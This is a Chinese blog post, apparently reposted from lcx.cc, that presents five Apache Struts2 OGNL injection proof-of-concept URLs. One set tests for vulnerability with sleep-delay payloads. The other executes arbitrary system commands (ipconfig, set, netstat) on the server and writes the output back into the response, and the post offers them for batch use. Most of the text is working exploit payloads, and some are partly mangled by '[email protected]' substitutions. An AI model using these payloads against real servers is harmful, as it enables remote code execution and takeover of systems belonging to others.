Struts2 5个远程代码执行漏洞利用POC + 批量 + DEMO

注：利用工具可以用任意语言编写其实就是发送漏洞代码就行了。一个request一个response，我尝试用过纯JS PHP JSP JavaSwing JavaFX 现在android版本都快写好了。本来打算发视频和利用工具的不过还是算了吧，懂的人自然就懂了.

演示DEMO下载：Struts2(1).zip

利用代码：

检测是否存在：

POC1:

http://127.0.0.1/Struts2/test.action?('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d))

POC2:

http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000))%2b'

POC3:

http://127.0.0.1/Struts2/hello.action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep(5000))(meh%29&z[%28foo%29%28%27meh%27%29]=true

POC4：

http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Thread@sleep(5000))(aa)&x[(class.classLoader.jarPath)('aa')]

POC5（执行了两次所以是10秒）：

http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Thread@sleep(5000)}

执行CMD命令：

关于回显：webStr75new40byte[100] 修改为合适的长度。

POC1:

http://127.0.0.1/Struts2/test.action?('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected].struts2.ServletActionContext@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[100]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=cmd%20/c%20ipconfig

POC2:

http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%[email protected]@getRequest(),%[email protected]@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[100],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%[email protected]@getResponse(),%23response.getWriter().println(%23result))%2b'&cmd=cmd%20/c%20ipconfig

POC3:

http://127.0.0.1/freecms/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%[email protected]@getRequest(),%[email protected]@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%[email protected]@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set

POC4:

http://127.0.0.1/Struts2/test.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d=+new+java.lang.Boolean(false),%23_memberAccess%5b%22allowStaticMethodAccess%22%5d=true,%[email protected]@getRequest(),%23a=%40java.lang.Runtime%40getRuntime().exec(%23req.getParameter(%22cmd%22)).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5b50000%5d,%23c.read(%23d),%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23s3cur1ty.println(%23d),%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]&cmd=cmd%20/c%20netstat%20-an

POC5：

http://127.0.0.1/Struts2/hello.action?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%[email protected]@getRequest(),%[email protected]@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%[email protected]@getResponse(),%23response.getWriter().println(%23result),%23response.close()}&cmd=cmd%20/c%20set

source

文章来源于lcx.cc:Struts2 5个远程代码执行漏洞利用POC + 批量 + DEMO

相关推荐: 【VBS】VBS 脚本延时，VBS等待指定时间命令

VBS 脚本延时，VBS 等待指定时间命令： wscript.sleep 2000  (延时2秒) 这就不用解释了吧、、太基础了。。 文章来源于lcx.cc:【VBS】VBS 脚本延时，VBS等待指定时间命令相关推荐: Ewebeditor 在线HTML编辑器…